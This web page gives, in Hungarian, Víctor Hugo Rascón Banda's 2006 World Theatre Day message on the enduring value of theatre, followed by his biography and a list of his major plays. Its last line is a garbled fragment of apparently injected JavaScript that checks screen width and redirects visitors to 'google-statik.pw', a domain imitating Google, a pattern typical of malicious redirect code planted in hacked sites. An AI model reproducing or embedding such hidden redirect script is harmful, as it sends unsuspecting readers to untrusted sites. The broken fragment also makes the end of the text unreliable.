2006. március 27. - Színházi Világnap

Victor Hugo Rascon Banda
mexikoi dramairo
REMENYSUGAR

Barcsak mindig szinhazi vilagnap lenne. Mar csak azert is, hiszen az elmult ketezer esztendoben a vilagon valahol mindig vilagitott a szinhaz langja.


Sokan a kezdetek ota a szinhaz haldoklasat josoljak, s ez kulonosen felerosodott a mozi, a televizio es az ujabb mediumok felbukkanasa es fejlodese ota. A technologia hatalmaba keritette a szinpadot, az ember mintha eltunt volna rola. Vizualis szinhazzal kiserleteznek, amely kozel all a festeszethez es a mozgashoz, de amely hatterbe szoritja a szot. Szulettek eloadasok szavak vagy vilagitas, sot szinesz nelkul is. Elofordult, hogy probababakat es babokat allitottak a fenyjatek kozeppontjaba.…

A technologia arra tett kiserletet, hogy tuzijatekka vagy vasari mutatvannya valtoztassa a szinhazat.

Ma azonban azt tapasztaljuk, hogy a szinhaz ujra a szinesz es a nezo szembesulesenek, talalkozasanak a szinhelye lesz. A szo visszater a szinpadra.

A szinhaz lemondott a tomegkommunikaciorol, de felismerte sajat lenyeget: emberek erzelmeket elnek at es kozvetitenek, erzeseket, almaikat osztjak meg egymassal, s legfokent remenyt sugaroznak. A szinhaz ma nem torteneteket mesel, hanem gondolatokat ad at.

A szinhaz zendul, felvilagosit, felkavar, kimozdit, follelkesit, leleplez, provokal, megtori a szabalyokat. A tarsadalommal folytat parbeszedet. A muveszetek kozott az elso, amely azert szall szembe az uresseggel, az arnyakkal es a csenddel, hogy ervenyre jusson a szo, a mozgas, a feny es az elet.

A szinhaz elo test: egyidoben hal el es szuletik ujja hamvaibol. A szinhaz magikus kozlesi forma, amelyben mindenki ad es kap, atalakul es atalakit.

A szinhaz tukrozi az ember egzisztencialis szorongasat, az emberi sors titkait kutatja. A szinhazban nem az alkotok, hanem a mai tarsadalom szolal meg.

Art a szinhaznak peldaul az, ha hianyzik a gyermekek muveszeti nevelese, ami egyertelmuen megneheziti a muveszet felfedezeset, befogadasat. A szegenyseg behalozza a vilagot, elidegeniti a kozonseget az eloadas szinhelyeitol, s ezt sokszor a kormanyok kozombossege es megvetese is tetezi.

A szinhazban hajdan istenek es emberek viaskodtak egymassal, manapsag az ember szol a tobbi emberhez. Ezert a szinhaz tobb mint maga az elet. A mai bolond vilagban a szinhaz hitet tesz a jozan igazsag erteke, az emberseg mellett, es a sajat sorsunk iranti felelossegre int.

A szinhaz abban segit, hogy megertsuk, mi tortenik velunk, hogy megfogalmazzuk erzeseinket, beszeljunk fajdalmainkrol, hogy a mindennapi kaoszbol es remalombol kiemelkedve a remenyrol szoljunk.

Eljenek a szinhazi ritus szolgai! Eljen a szinhaz!

Victor Hugo Rascon Banda 1948-ban szuletett Uruachic-ban, Eszak-Mexiko banyavarosaban. Bar a csaladi hagyomany arra kesztetne, hogy o is a banyaban dolgozzon, megis jogot tanul, s nem csak jelentos ugyved, de hazajaban elismert dramairo lett.

Darabjaiban sokat meritett a gyerekkoraban megismert emberek eletebol, de hatott ra francia, nemet es spanyol dramairodalom is. 1979-ben irja meg elso szindarabjat Voces en el umbral (Hang a kuszobon) cimmel, amely ket asszony eletet mutatja be, egy nemet noet es egy tarahumaraiet, akik megelik egy banya mukodesenek csucspontjat es hanyatlasat. A Los ilegales (A torvenytelenek) az elso darabja, amelyet bemutattak. Azota korulbelul otven darabot irt. Nemzeti es nemzetkozi dijat kapott, tobbek kozott 1981-ben az Eszak-Amerikai Szinhaz dijat.

Jelentosebb szindarabjai:

Contrabando (Csempeszek) 1991.

La mujer que cayo de cielo (Az egbol pottyant asszony) 1999.

Sazon de mujer (Az asszony ize) 2001.

Apaches (Apacsok) 2003.

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width